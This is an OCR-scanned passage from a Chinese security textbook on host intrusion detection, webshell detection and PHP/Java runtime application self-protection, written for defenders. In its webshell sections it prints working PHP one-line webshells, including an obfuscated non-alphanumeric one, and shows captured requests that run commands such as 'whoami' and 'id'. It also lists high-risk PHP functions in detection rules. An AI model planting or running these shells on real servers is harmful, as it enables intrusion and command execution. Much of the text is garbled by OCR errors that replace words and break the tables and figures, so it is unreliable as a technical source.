计算 带 来 的 系统 资源 消耗 基本 以 后 端 数 据 分 析 为 主 。 那 么 数据 传输 就 
是 必要 且 重 要 的 功能 模块 。 同 时 在 “大 数据 时 代 ”， 数 据 质量 、 数 据 运 
营 可 靠 性 成 了 支撑 安全 能 力 指标 的 关键 性 要 素 ， 必 须 认 真 对 待 。 技 术 
方案 如 下 。 


“syslog 转 发 一 一 当 数 据 分 析 架 构 在 初级 阶段 ， 信 用 Linux 系 统 目 囊 
的 syslog 转 发 基本 能 满足 数据 传输 统一 管理 的 需求 。 只 需 修 改 syslog 服 
务 的 配置 文件 即 可 实现 转发 ， 不 需要 额外 开发 数据 接收 Server 。 


此 轻 量 解决 方案 易于 实现 ， 但 缺点 也 很 明显 ，syslog 数 据 传输 夭 认 
采用 UDP 514 闹 口 ， 假 如 数据 量 较 大 或 者 数据 量 波 动 可 能 会 丢 数 据 。 为 
外 敏感 数据 也 可 能 因明 文 传输 而 泄露 。 


-数据 直 传 一 一 在 数据 量 较 少 的 阶段 ， 壁 如 agent 部 署 量 在 儿 千 台 服 
务 郁 的 阶段 ， 前 病 agent 采 集 的 数据 可 以 直接 发 送 到 HIDS 后 端 Server， 
Hi 


型 的 如 OSSEC 。 


.数据 接收 Server 当 HIDS 系 统 部 署 运营 到 BAT 这 类 公司 的 量 
， 数 据 通 道 的 建设 束 必 须 更 为 刘 慎 。 


在 BAT 这 类 公司 ， 通 常 运营 (包括 安全 ) 监控 都 有 成 熟 的 数据 通 
道 ， 那 么 在 安全 系统 建设 过 程 中 ， 也 可 以 复 用 它 ， 既 避免 重复 造 轮子 
带 来 的 开发 资源 浪费 ， 也 能 快速 的 获得 数据 质量 和 可 靠 性 的 保障 ， 从 
公司 运营 体系 角度 来 看 也 是 有 益 的 。 


那么 如 有 果 没 有 合适 的 可 用 的 现成 系统 的 时 候 ， 新 建 这 类 数据 通道 
需要 注意 什么 呢 ? 如 下 所 示 : 


1) 避免 数据 传输 波峰 “雪崩 效应 ”， 例 如 当 某 个 机 房 网 络 不 通 时 ， 
数据 可 能 挤 压 在 缓存 里 ， 在 网 络 通畅 之 后 集中 传输 占用 网 络 通道 以 及 
对 接受 Server 市 来 类 似 DDoS 的 效 末 。 可 对 数据 传输 队列 做 随机 性 的 主 
动 延迟 ， 避 免 拥 塞 ， 另 外 可 使 用 Server 端 下 发 < 数据 上 报 ” 任 务 的 方式 来 
触发 上 传 ， 而 非 agent 主 动 无 序 上 报 。 


2) 敏感 数据 脱 敏 及 加 密 ， 很 多 数据 中 包含 敏感 信息 ， 如 http 请 求 
里 的 cookie、 命 令 行 里 的 密码 。 配 合 业 务 部 门 或 数据 安全 部 门 制 定数 据 


采集 规范 ， 在 agent 端 隐 去 敏感 信息 ， 传 输 环 节 做 好 加 密 ， 存 储 系统 做 
好 权限 控制 。 


3) 做 好 每 个 数据 传输 环节 的 前 后 链 对 账 ， 当 出 现 安全 事件 漏 报 时 
能 及 时 人 退 查 到 可 能 导 人 至 数据 丢失 的 环 证 ， 便 于 后 续 的 优化 与 debug 。 


4. 控 制 管 理 


企业 级 HIDS 系 统 部 嗜 量 非常 大 ， 且 安全 防守 体系 任何 一 点 的 故障 
都 可 能 导致 整体 防守 的 失效 。 合 理 的 管理 手段 ， 能 让 整套 系统 更 为 健 
壮 ， 确 保 可 用 性 。 


-健康 度 监 控 一 一 与 传统 安全 系统 基于 端的 检测 方式 不 同 ， 新 型 的 
企业 级 HIDS 系 统 往往 采用 后 端 数 据 分 析 的 方式 实现 入 侵 场 景 检 测 ， 从 
行为 数据 采集 到 数据 传输 存储 、 分 析 ， 是 一 个 较 长 链条 的 流程 ， 必 须 
逐一 对 每 个 环 让 做 好 数据 对 账 、 异 凋 监 控 。 瘦 见 的 检测 点 如 表 8-3 所 
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表 8-3 E ATRE R, 


检测 点 监控 内 容 
心跳 Agent 是 否 存 活 ， 有 无 coredump 、 掉 线 等 
Agent 数据 采集 Agent 功能 模块 是 否 可 正常 获取 数据 
本 地 数据 上 传 Agent 采集 的 数据 是 否 上 传 成 功 ， 内 存 是 否 超 限 
数据 接收 Server 接收 Server 是 否 有 丢 包 ， 是 否 达到 性 能 瓶颈 
存储 Agent 上 报 数据 是 否 全 量 写 和 磁盘， 数据 对 账 
分 析 引 警 上 报 数据 是 否 全 量 进 入 分 析 引 擎 ， 是 否 有 丢 包 和 性 能 
压力 
漏 报时 间 漏 报 事件 追溯 


“ 目 杀 ?机 制 一 一 互联 网 企业 里 ， 业 务 会 极度 榨取 系统 性 能 ， 那 么 
安全 系统 的 部 署 也 同样 会 受到 严格 挑战 。 毕 竟 业 务 系统 的 稳定 运行 才 
征 第 一 目标 ， 安 全 在 极端 情况 ， 以 及 出 现 故障 的 时 候 必 须 为 业务 稳定 
牺牲 。 在 产品 设计 中 会 设 定 一 些 系统 资源 耗 用 指标 ， 超 出 指标 则 暂停 
功能 模块 甚至 会 < 目 杀 ”。 第 见 指 标 如 下 : 


:CPU 占用 <10%~20% 
-内存 占 用 <100M 
.数据 上 传 <200/s (根据 环境 可 配 ) 


:部署 与 更 新 一 一 日 常 运营 中 必然 会 碰 到 部 署 和 更 新 的 需求 ， 在 
HIDS 架 构 里 必须 有 推送 更 新 的 功能 。 单 从 功能 和 技术 角度 来 说 “更 
新 ”功能 与 大 多 数 软件 系统 一 样 没有 什么 特别 需要 讲 的 ， 在 大 型 互联 网 
企业 中 重点 关注 两 个 方面 : 


1) 海量 环境 影响 一 一 大 型 网 络 中 ， 动 辑 上 万 甚至 几 十 万 的 部 署 
量 ， 对 于 每 次 的 更 新 必须 谍 慎 。 这 里 需要 设 定 以 下 原则 : 


-发布 前 必须 通知 业务 方 ， 必 须 有 应 急 预 案 和 回 秘 手段 。 


-遵循 灰 度 发 布 原则 ， 未 经 一 个 可 靠 的 时 间 周 期 (通常 一 个 月 ) 
稳定 运营 验证 ， 不 得 批量 部 署 。 不 同业 务 环境 分 别 灰 度 。 


-市 假日 前 不 部 署 。 
.agent 更 新 行为 由 Server 端 推送 任务 完成 。 


2) 安全 性 一 -曾经 有 人 开玩笑 说 ， 部 署 的 这 么 多 Agent 就 相当 于 
一 个 大 型 的 分 布 式 僵尸 网 络 。 确 实 ， 假 设 恶意 攻击 者 能 操纵 任何 的 
HIDS 集 群 系统 的 控制 指令 和 平台 ， 那 么 真 的 十 “一 损 俱 损 *”。 为 确保 管 
理 控制 系统 的 安全 性 ， 必 须 设 定 几 个 安全 原则 : 


-控制 CRS) 指令 仅 允 许 选 择 固化 的 指令 ， 严 禁 在 Agent 端 预 留 
执行 系统 命令 的 接口 ; 


更 新 包 必 须 经 过 第 三 方 安全 工程 师 审核 之 后 上 传 至 更 新 Server 保 
存 ， 更 新 仅 允许 选择 更 新 Server 上 已 有 的 安装 包 : 


-控制 指令 下 发 时 必须 由 第 三 方 审核 批准 才 可 执行 。 


8.2 ”检测 webshell 


互联 网 公司 Web 类 的 应 用 服务 占 较 大 比例 ， 那 么 在 此 攻击 面 上 的 攻 
防 入 侵 场景 中 占 比 非常 高 ， 几 乎 Web 安 全 成 了 攻防 对 抗 的 代名词 。 而 在 
Web) fz} ax Ht A — TIT ite “getshell”, tiie BE Web/al | 
webshell。 那 么 Web 安 全 能 力 中 一 个 最 重要 的 指标 就 是 webshell 检 测 能 
力 。 以 至 于 很 多 中 小 型 安全 产品 ， 从 诞生 之 初 就 以 webshell 检 测 能 力作 
为 核心 任务 。 


webshell 通 第 写 一 个 文件 ， 那 么 静态 文件 的 扫 摘 检测 征 音 见 做 法 ， 
但 由 于 攻防 技术 的 对 抗 发 展 ， 静 态 文 件 的 变形 越 来 越 多 ， 已 不 足以 满 
足 检 出 率 要 求 ， 于 是 出 现 了 流量 检测 、 运 行 时 检测 等 方案 。 


Lato 


静态 文件 检测 是 常规 做 法 ， 在 Linux 系 统 里 ， 一 个 webshell 检 测 模 
块 运作 流程 如 图 8-8 所 示 。 


inotify 监控 


web 目录 


文件 静态 扫描 : 


高 危 函 数 


图 8-8 ”webshell 检 测 模 块 运作 流程 


文件 静态 扫描 基于 黑 名 单 特征 字符 串 ， 以 及 几 个 “ 噩 危 负 数 ”出 现 
概率 的 组 合 ， 通 肖 一 个 业务 CGI 文 件 ， 几 平 不 可 能 存在 文件 读 写 、 命 令 
执行 、 代 码 执行 、DB 操 作文 件 上 传 几 类 画 数 同时 出 现 的 情况 。 


对 于 只 会 使 用 工具 的 普通 scriptkids 来 说 ， 静 态 检测 已 经 够 用 ， 但 
对 稍微 经 验 老 道 些 的 攻击 者 驶 力 不 从 心 了 。 特 别 是 php webshell， 由 于 
php 语 法 变化 多 端 ， 变 形 webshell 检 测 难 度 极 大 。 


tiny php shell 一 句 话 webshell: http://h.ackack.net/tiny-php-shell.html 


<?=($_=@$_GET[2]) .@$_($_GET[1])?> 


Non alphanumeric webshell4 @ alpha ¢¥ HJ webshell: 


http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/ 


<?$_=""; $_[+""]='';$ =R Mage e =($ cae) ($_[+""]|""). ($_[+""]^"");?> 
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从 统计 学 角度 的 检测 方案 ， 同 样 观察 上 述 代 码 ， 不 难 发 现 特殊 字符 的 
出 现 比例 明显 过 天， 同时 根据 对 目 身 业务 代码 计算 信息 箭 ， 必 有 定 能 区 
别 恶意 代码 。 


或 许 上 述 有 些 过 于 学 院 派 ， 大 家 未 必 能 有 直观 的 理解 。 同 时 根据 
笔者 的 实践 来 看 ， 在 大 型 互联 网 企业 中 ， 由 于 各 业务 部 门 代码 风格 多 
变 ， 特 别 是 汉字 在 代码 中 对 信息 燃 的 采集 比 对 分 析 影 响 特别 大 ， 不 古 
特别 推荐 。 那 么 还 有 没有 其 他 “简单 粗暴 ”的 方案 呢 ? 管 案 古 肯定 的 ! 


安全 图 往往 会 流传 这 样 的 一 段 话 , “三 分 技术 ， 七 分 管理 "， 虽 然 
不 能 简单 苟同 ， 但 是 技术 结合 “管理 手段， 确实 能 带 来 事半功倍 的 歼 
果 。 一 个 攻击 者 写 入 的 webshell 和 业务 CGI 文件 其 实 有 太 多 的 不 同 ， 假 
设 你 的 企业 有 严格 的 发 布 管理 流程 、 运 维 治理 环境 的 话 ， 好 坏 CGI 文 件 
的 辨别 更 是 轻而易举 。 这 里 列举 可 使 用 的 维度 。 


表 8-4 ”可 用 维度 


检测 点 基于 业务 特点 正常 异常 
文件 属 主 统一 的 发 布 系统 属 主 为 发 布 系统 启动 账户 属 主 为 webserver 进程 账户 
生成 时 间 工作 时 间 工作 时 间 内 生成 非 工 作 时 间 生 成 
生成 时 间 同 目录 文件 统一 生成 大 概率 与 同 目 录 内 其 他 文件 在 连续 | “与 同 目录 其 他 文件 生成 时 间 
时 间 内 生成 相差 甚 远 
inode 同 目录 文件 统一 生成 同 目录 下 文件 inode 连续 分 布 与 同 目录 其 他 文件 inode 相 
目录 上 传 目 录 不 保存 CGI CGI 文件 位 于 Web 用 户 不 可 写 目 录 | 位 于 上 传 文件 夹 


上 上 面 仅 列举 了 常见 可 利用 的 业务 特点 ， 其 实 当 你 分 析 清 楚 你 业务 
环 记 的 特点 之 后 ， 可 以 指定 出 更 多 的 检测 维度 。 


那么 到 这 里 ， 我 们 的 webshell 检 测 流程 如 图 8-9 所 示 。 


异常 业务 于 


境 的 特征 


图 8-9 webshell 检 测 流程 改进 


2. 流 量 监测 


本 地 静态 扫描 方法 至 少 需 要 一 部 分 开发 工作 量 ， 如 果 仪 有 accesslog 
可 以 用 ， 或 者 能 够 获取 到 网 络 流 量 的 时 候 ， 从 http 请 求 记录 中 也 可 以 挖 
掘 可 能 存在 的 webshell， 以 及 webshell 攻 击 行为 。 


p> 


2 es DL webshelleit, Xt—-webshell http ia KM iA ze Al FE 
Hy, f48“cookie”, post data， 功 能 函数 参数 等 等 ， 如 图 8-10 所 示 。 


Headers Preview Response Comics Ting 


SG yrs Sepp see Eo 


Cookie: wp-settings—1= hidetb%3D1%26editor%3Dt inymce%26m6%3D0%26m5% 
9%3D0%26m8%3D0%26 ings ize%*3D ful 1%26m7%3D0%26 LibraryContent%3Dbrows¢ 


B—ht tp%253A%252F%252 
55865892 ohpspypass=pwd4webshe Ll 


Host: 


e So 


Origin: http: / /@m a: 

Referer: http: / qa /phpspy. php 

Upgrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.@ (Macintosh; Intel Mac OS X 10_11_3) AppleW 
hrome/48.0.2564.116 Safari/537.36 


Y Form Data view parsed 


action=shellL&command=whoamidésubmit=Execute 


图 8-10 ”webshell 请 求 特 征 (cookie&post data) 


这 些 细节 ， 对 于 scriptkids 来 说 不 会 想到 甚至 没有 能 力 去 修改 ， 对 
于 检测 常见 webshell 非 常 好 用 。 


那么 如 果 有 一 定 CGI 代码 开发 能 力 的 攻击 关 呢 ， 从 静态 代码 和 http 
请 求 特 征 检测 束 不 那么 好 使 了 。 解 决 这 个 问题 之 前 ， 咱 们 先 回顾 一 下 


MDE ° 


如 图 8-11 所 示 ， 从 用 户 对 网 站 的 访问 行为 以 及 记录 上 看 和 攻击 者 是 
有 明显 区 别 的 ， 表 8-5 逐 一 列举 。 


根据 上 述 各 维度 的 对 比 不 难看 出 墨客 对 webshell URL 访 问 行为 和 正 
常 的 用 户 对 网 站 业务 CGI 访问 的 区 别 非常 大 。 笔 者 对 此 类 检测 方案 曾 开 
发 了 一 个 webserver 日 志 分 析 脚 本 
https://github.com/xti9er/LogForensics/blob/master/LogForensics.pl ， 利 用 
此 日 志 分 析 脚 本 ， 从 大 量 用 户 访问 中 抓 取 可 疑 的 记录 ， 并 根据 第 一 次 
抓 取 的 特征 IP 或 URL 继 续 跟 进 ， 抓 出 可 能 的 webshell 和 攻击 请 求 流量 。 
流量 分 析 控 掘 异常 攻击 请 求 如 下 所 示 : 


网 站 用 户 B 
123.87.2.128 


网 站 用 户 C 


一 


ee ee 


网 站 用 户 E 
32.68.32.8 


观察 点 业务 CGI 
访问 来 源 多 个 无 关 IP 来 源 ， 日 常 频 繁 被 访问 
历史 记录 日 常 时 间 内 频繁 被 访问 
User-agent 统一 CGI 被 多 种 UA 和 用 户 类 型 访问 
Cookie 有 网 站 统一 的 用 户 标 示 
请 求 内 容 规范 的 参数 


搜索 引擎 记录 有 与 网 站 结构 相关 的 链接 跳 转 ， 经 常 
PLR EI 


234.127.49.9 


图 8-11 正常 和 异常 URL 访 问 行为 差异 
表 8-5 ”观察 结 


webshell 

日 常 无 人 访问 过 的 URL， 仅 有 一 个 卫 (黑客 或 
肉鸡 ) ak IP Be (ADSL 用 户 ) 访问 过 仅 有 的 几 次 
在 夜间 或 极 罕见 时 段 出 现 ， 无 任何 网 站 统一 调用 
框架 代码 

固定 的 UA， 固 定 的 用 户 特征 

无 网 站 标示 

仅 有 POST 请 求 ， 且 post data 被 “加 密 ” 


无 与 网 站 其 他 页 面 的 跳 转 链接 ， 未 被 搜索 引擎 疏 
取 索 引 


r httpd -fast -file 


md php 


3 ) : $ fe (2) 

ee [20 0 4—10-( > 53 mC (4) 
[=*=] All Done in 6 
Lr oct | ‘Log S Pas $ Cess_log -url cmd.php 


ip=NULL 

LOAD 

ip + 

ip + 

Export report... Pl 
All Done inds ,i 


Ve 
* 
ARAMMMAMMRADA 


[ 
[ 
[*] All Done in 4 


8.3 RASP 


随 着 攻防 对 抗 的 升级 ， 防 守 方 发 现在 已 有 的 日 志和 数据 中 ， 已 很 
难 提升 分 析 检 测 能 力 。 误 报 越 来 越 多 ， 事 件 奶 漳 无 足够 的 细节 可 用 。 
而 反之 攻击 方 则 挖掘 出 越 来 越 多 的 漏洞 ，Web 代 码 越 来 越 多 ， 开 发 语言 
的 灵活 性 越 来 越 大 ， 相 应 的 攻击 代码 也 变 得 灵活” 而 不 易 检 测 。 


我 们 需要 一 种 数据 和 能 力 实时 刻画 攻击 事件 现场 ， 甚 至 于 依据 模 
型 直接 阻 断 恶 意 行为 ， 于 是 RASP (Runtime Application Self Protect) A 


统 应 运 而 生 。 


目前 主流 的 Web 开 发 框架 都 是 基于 PHP 和 Java 语 言 ，Web 安 全 的 攻 
防 焦点 几乎 都 齐 聚 这 两 种 语言 环境 中 ， 对 应 的 RASP 在 这 两 类 语言 环境 
中 均 能 大 展 拳脚 。 


8.3.1 PHP RASP 


1. 技 术 架 构 


PHP 走 解释 型 语言 ， 将 PHP 代 码 解释 为 opcode 之 后 再 交 由 Zend 引 擎 


执行 。 图 8-12 是 PHP Zend 引 警 架 构图 。 


Web 服务 软件 


数据 库 Modules 


J ee oe" oT one 


Zend 引擎 


Web 服务 磁盘 


图 8-12 PHP Zend 引 擎 架构 图 


如 图 8-12 所 示 ， 当 网 站 的 用 户 在 访问 一 个 PHP 页 面 是 ， 当 访问 请 求 
被 PHP 初 始 化 ，ZE 便 把 PHP 脚 本 翻译 成 符号 (token) ， 最 终 翻 译 成 可 
以 进行 单 步调 试 和 执行 的 opcode。 如 果 这 些 opcode 中 的 一 个 指令 需要 调 
用 一 个 扩展 函数 ，ZE 将 会 给 那个 函数 绑 定 参数 ， 并 且 I 临 时 放弃 控制 权 
直到 画 数 执行 完成 。 由 此 可 以 看 出 ，PHP 代 码 的 执行 流程 中 opcode 的 翻 
译 和 画 数 调用 是 必 经 环节 ， 而 Zend3 引 擎 是 支持 扩展 ， 那 么 我 们 的 
PHPRASP 方 案 丈 是 通过 Zend 扩 展 模 块 实现 对 恶意 行为 记录 和 阻 断 。 


为 了 部 署 和 可 移植 性 ， 以 及 检测 阻 断 能 力 的 可 扩展 ， 需 要 在 常规 
扩展 基础 之 上 增加 一 个 规则 查询 、 匹 配 模块 ， 此 模块 与 本 地 配置 管理 
daemon 进 程 通信 ， 在 每 一 个 PHP API 调 用 时 检测 其 行为 的 合法 性 ， 给 出 
事件 是 否 阻 昕 、 记 录 或 允许 执行 的 判断 。 配 置 管理 daemonj 进 程 负责 与 
后 疾 配 置 管理 Server 通 信 ， 更 新 cache 最 新 的 规则 。 
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管理 daemon 进 程 ， 由 daemon 进 程 上 报 至 后 端 数据 分 析 集 群 。PHP 
RASP 架 构 如 图 8-13 所 示 。 


2. 检 测 模 型 
PHP 是 解析 型 语言 ， 在 执行 时 逐 行 翻译 为 opcode， 那 么 它 zend 扩 展 


可 以 实现 记录 每 个 HOOK 的 API 在 哪 一 行 被 执行 ， 调 用 参数 是 什么 。 


Boe 
ececcce 


Manager- $ 
Daemon 


ee 


数据 分 析 集 群 


RASP Agnet 配置 管理 服务 器 


图 8-13” PHP RASP 架 构 


相 比 HIDS 来 说 ， 除 了 可 以 记录 命令 执行 之 外 ， 还 能 记录 CGI 层 面 
的 很 多 API， 壁 如 IO 类 、DB 类 、 网 络 连 接 、 文 件 上 传 等 等 。 相 比 HIDS 
如 果 和 希望 知道 IO 行为 ， 需 要 过 滤 整 个 系统 的 海量 IO 操作 不 同 ， 因 为 
RASP 的 监测 范围 仅 限 制 在 了 CGI 代码 层面 的 调用 ， 性 能 的 开销 小 了 很 


多 个 数量 级 。 而 Web 入 口 的 安全 却 又 是 目前 安全 攻防 的 焦点 ， 这 个 性 价 
比 旦 非 营 划算 的 。 因 为 RASP 可 以 兼顾 这 么 多 丰 刘 的 API 调 用 ， 以 及 调 
用 细节 ， 对 于 入 侵 检测 能 力 来 说 就 增加 了 很 多 个 维度 。 


实际 的 检测 能 力 效果 ， 这 里 以 webshell 检 测 为 例 。Php 语 法 的 灵活 
性 使 得 传统 的 静 仿 文件 扫 搬 方式 几乎 走 进 了 死胡同 ， 如 下 所 示 很 多 近 
乎 于 变态 的 编码 转换 几乎 无 法 有 效 检 测 。 


Tt) [+""]]""). ($A); 


但 是 RASP 并 不 受 此 影响 ， 因 为 它 可 以 在 运行 时 记录 其 行为 ， 无 论 
多 么 变态 的 编码 转换 ， 在 opcode 这 里 还 是 会 显 形 。 


比如 攻击 者 通过 请 求 nonalpha.php? _=exec&__=id 执 行 了 一 条 命 
令 ， 会 被 记录 如 下 : 


File: /usr/local/apache/htdoc/nonalpha. php 
Function 


exec 
Line:5 
Parami: id 


由 此 可 见 ， 任 何 的 基于 文件 字符 串 编 码 转换 是 逃 不 过 动态 监测 
的 。 与 此 同时 ， 如 果 在 文件 内 容 中 没 找到 exec 字 符 串 ， 反 倒 会 作为 一 个 
高 危 的 webshell 检 测 特征 。 


在 实际 的 运营 过 程 中 ， 更 多 的 是 以 RASP 输 出 的 结构 化 数据 建立 检 
测 模型 。 假 设 我 们 的 网 站 存在 一 个 上 传 漏洞 ， 被 人 攻击 成 功 ， 上 传 一 
个 webshell。 那 么 这 个 事件 在 RASP 系 统 中 将 会 被 记录 如 图 8-14 所 示 。 


file_upload.php a | 上 传 漏洞 


move_upload_file("/tmp/xxxx.php","./first_shell.php") 


first_shell.php ———| webshell 


move_upload_file("/tmp/x0«.php","./other_shell.php") 


other_shell.php 


system('nmap XX.XX.XX.XX ) 


| webshell 


phpinfo() 
mysql_connect() 


图 8-14 ”基于 RASP 数 据 模型 检测 webshell 


从 图 中 可 以 很 明显 的 看 出 整个 攻击 流程 ,但 是 仅 能 “看 ”出 问题 还 
不 能 算 完 ， 接 下 来 整理 出 检测 模型 : 


高危 函 数组 合 模式 检测 webshell- 一 当 一 个 PHP 在 一 段 时 间 内 的 访 
问 和 触发 了 多 个 高 危 画 数 ， 那 么 被 判定 为 webshell 文 件 ， 规 则 基于 这 么 一 
个 假设 “一 个 正常 的 业务 PHP 文 件 ， 不 可 能 同时 拥有 这 么 多 危险 函数 功 
fE” o 以 下 是 规则 模板 。 


"total_value":5, 
"describe":"webshell [filename] be found", 
"risk_func": [ 


"func": ["system", "popen", "exec", "passthru"], 


"value" :2 

}, 

{ 
"func": ["move_upload_file", "phpinfo"], 
"value" :2 

}, 

{ 
"func":["file_get_content", "mysql_connect" ], 
"value":1 

} 


:上下文 关联 检测 webshell 一 一 当 一 个 PHP B 文 件 被 PHP A 上 传 或 写 
入 ， 同 时 这 个 被 写 入 的 PHP 文 件 又 有 读 写 文件 、 上 传 文件 、 执 行 命令 等 
行为 ， 那 么 这 个 “上 传 和 写 入 ”行为 是 webshell 上 传 攻 击 事件 。 模 型 基于 
这 样 一 个 假设 “一 个 CGI 文 件 写 入 上 传 文件 是 正 第 的 ， 但 被 它 生 成 的 如 
果 是 PHP 文 件 ， 且 这 个 PHP 有 高 危 API 调 用 行为 ， 那 么 这 是 入 侵 事 件 ”。 


{ 
"describe":"[filenameA] File Upload Vulnerability,webshell [filenameB] 
be found", 
"factory": { 
"filenameA. func", "move_upload_file", 
"filenameA.parameter.2":"filenameB", 
"filenameB. func": ["move_upload_file", "system", "exec","", "phpinfo" ] 
} 
} 


8.3.2 Java RASP 
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试 、 监 控 等 日 的 而 生 的 框架 和 接口 能 用 于 作为 RASP 产 品 的 技术 方案 。 


下 面 我 们 来 列举 可 以 使 用 的 技术 方案 。 
1. 技 术 架 构 


修改 rtjar。rtjar 是 Java 基 础 类 库 ， 位 于 {Java_HomeHMjre/lib/ 下 。 
Java 中 对 于 文件 系统 ， 网 络 ， 数 据 库 的 访问 ， 以 及 操作 系统 命令 的 调 
用 ， 都 是 通过 调用 rt.jar 中 相应 的 类 来 实现 的 。 为 了 得 到 上 面 这 些 方法 
的 调用 信息 ， 可 以 改变 这 些 相关 类 ， 在 代码 中 加 入 日 志 信 息 ， 并 将 改 
变 后 的 类 打包 成 新 的 rt.jar， 奉 换 掉 {Java_HomeJyjre/lib/ 下 原来 的 jar 包 。 
这 样 在 这 些 类 被 调用 时 ， 就 可 以 得 到 调用 的 日 志 信息 。 


优势 : 简单 ， 性 能 好 。 


缺点 : 静态 替换 ， 无 法 动态 加 入 新 的 监控 点 ， 可 维护 性 莽 ， 和 jdk 


JVMTI (JVM Tool Interface) 是 Java 虚 拟 机 所 提供 的 native 编 程 接 
口 ， 因 此 使 用 JVMTI 需 要 我 们 与 COCC++ 以 及 JNI 打 交道 ， 开 发 时 一 般 采 
用 建立 一 个 Agent 的 方式 来 使 用 JVMTI， 把 Agent 编 译 成 一 个 动态 链接 
库 ， 设 置 一 些 回 调 函 数 ， 并 从 Java 虚 拟 机 中 得 到 当前 的 运行 态 信 息 。 
JVMTI 的 功能 非常 丰富 ， 包 含 了 虚拟 机 中 线程 、 内 存 、 堆 栈 、 类 、 方 
法 、 变 量 、 事 件 、 定 时 器 处 理 等 20 多 类 功能 。 


由 于 使 用 native 语 言 ， 运 行 在 虚拟 机 之 外 ，JVMTI 方 案 对 于 性 能 、 
内 存 泄漏 、 故 障 检测 程序 来 说 具有 很 多 优点 ， 如 下 所 示 : 


1) 功能 强大 ， 能 够 看 到 更 多 的 信息 : 如 GC、 锁 、 线 程 。 


2) 即使 虚拟 机 出 现 问题 时 ，Agent 也 可 以 继续 收集 到 虚拟 机 的 信 


3) 减少 了 虚拟 机 的 影响 ， 负 荷 和 内 存 占 用 。 


4) 性 能 更 好 : native 语 言 更 高 效 ， 在 JVMTI 层 有 的 接口 更 高 效 ， 
例如 .stack traces。 


缺点 : 


1) JVMTI 接 口 复杂 ， 实 现 起 来 也 比较 麻烦 。 


2) 通用 性 差 : 由 于 是 native 语 言 ， 需 要 在 不 同 的 操作 系统 上 分 别 
编译 和 测试 。 


3) 稳定 性 差 : 由 于 和 JVM 同 时 运行 在 一 个 进程 中 ， 并 且 在 JVM 之 
外 ， 任 何 的 错误 容易 引起 整个 进程 的 退出 。 


(1) Java Agent 


Java Agent Instrumentation KES Bie RE MON ASE AER 
作 。 在 Java SE 5 中 首次 引入 ，Instrument 要 求 在 运行 前 利用 命令 行 参数 
或 者 系统 参数 来 设置 代理 类 ; 在 Java SE 6 里 面 ，instrumentation 包 被 赋 
予 了 更 强大 的 功能 : 启动 后 的 instrument、 本 地 代码 (native code) 


instrument， 以 及 动态 改变 classpath 等 。 


事实 上 , “java.lang.instrument” AVA ASH, PEAT IVMTI: 在 
Instrumentation 的 实现 当中 ， 存 在 一 个 JVMTI 的 代理 程序 ， 通 过 调用 
JVMTI 当 中 Java 类 相关 的 函数 来 完成 Java 类 的 动态 操作 。 


由 于 Java Agent 是 纯 Java 的 接口 ， 具 有 以 下 优点 : 
1) 接口 简单 ， 实 现 相 对 JVMTI 容 易 。 
2) 通用 性 好 ， 运 行 在 JVM 中 ， 不 用 考虑 操作 系统 的 差异 。 


3) 稳定 性 好 : JVM 对 于 运行 在 其 中 的 代码 做 了 很 多 保护 ， 来 防止 
错误 的 代码 引起 进程 的 退出 。 


缺点 : 
1) 相 比 JVMTI 功 能 少 一 些 ， 但 对 于 安全 的 Agent 足 够 。 
2) 有 些 接口 例如 stack traces 的 比 JVMTI 性 能 差 。 


(2) Btrace 


Btrace 是 由 Kenai 开 发 的 一 个 开源 项 目 ， 它 可 以 用 来 帮 有 我 们 做 运行 
时 的 Java 程 序 分 析 ， 监 探 等 等 操作 。Btrace 是 由 : Attach API+BTrace 脚 
本 解析 引 警 +ASM+JDK6 Instumentation 组 成 。 


Btrace 是 一 个 安全 ， 可 以 动态 跟踪 Java 程 序 的 一 种 工具 。Btrace 的 
初衷 是 要 “ 跟 踩 代 人 码 ”， 而 不 是 修改 代码 ， 他 的 操作 不 会 对 原 有 Java 进 程 
产生 影响 ， 不 用 关闭 正在 运行 的 Java 进 程 ， 也 不 会 修改 Java 进 程 中 的 逻 
辑 和 数据 。 


由 于 Btrace 是 基于 Java Agent (Instumentation) 实现 的 ， 除 了 
Instumentation 同 样 的 优点 外 ， 还 具有 如 下 优点 : 


1) 不 用 实现 ， 直 接 可 用 ， 只 需 写 BTrace 脚 本 即 可 。 
2) 安全 性 好 ， 对 原 有 的 Java 程 序 只 读 ， 没 有 任何 修改 。 
缺点 ， 只 能 实现 信息 的 读 取 ， 无 法 实现 阻 断 。 


BTrace 的 安全 性 检查 是 通过 Verifier 来 实现 的 ， 规 范 可 参照 JSR 
269。 将 该 类 重 写 就 可 以 突破 BTrace 的 安全 限制 。 重 写 Verifier 可 以 实现 
BHI ° 


(3) HotCode2 


HotCode2 是 一 款 纯 Java 实 现 的 全 站 式 热 部 署 解决 方案 ， 无 论 是 修 
改 Java 文 件 还 是 框架 配置 文件 ， 也 不 管 你 是 在 本 地 还 是 远程 开发 机 部 
署 ， 都 无 需 重启 Java 虚 拟 机 而 立即 生效 ， 从 而 减少 开发 过 程 中 频繁 编译 
打包 和 部 署 的 次 数 。HotCode2 本 质 上 是 一 个 Java Agent， 因 此 可 以 运行 
在 任何 Java 程 序 之 上 。HotCode2 的 核心 功能 是 提供 对 Java 文 件 的 热 部 团 
功能 ， 通 过 字 节 码 变换 ，HotCode2 突 破 了 Hotswap 的 只 能 修改 方法 体 的 
限制 ， 可 以 让 你 对 一 个 类 进行 任意 修改 。HotCode2 通 过 SDK 的 形式 提 
供 了 对 各 种 框架 的 支持 ，Java 文 件 修 改 + 框架 支持 ， 真 正 实现 一 站 式 热 
部 署 解 决 方案 ， 他 不 像 Btrace 那 样 有 脚本 分 析 引 警 和 ASM， 如 果 要 实现 
规则 的 自动 部 署 ， 需 要 自己 实现 规则 分 析 引 擎 和 ASM 部 分 。 


除了 具有 Java Agent (Instumentation) 同样 的 优点 外 ，HotCode2 还 
具有 如 下 优点 : 突破 了 Hotswap 的 只 能 修改 方法 体 的 限制 ， 可 以 让 你 对 
一 个 类 进行 任意 修改 。 


缺点 有 以 下 两 点 : 


需要 目 己 实现 规则 分 析 引 擎 和 ASM 部 分 。 


为 了 实现 任意 修改 类 ， 每 个 类 都 会 额外 增加 两 个 特殊 的 Filed 和 通 
用 的 构造 丽 数 ， 对 线 上 代码 改动 大 ， 增 加 了 风险 。 


Java 环 境 与 PHP 有 很 大 的 不 同 ， 我 们 可 以 从 调用 栈 获取 更 多 关于 攻 
击 事件 的 细 市 : 


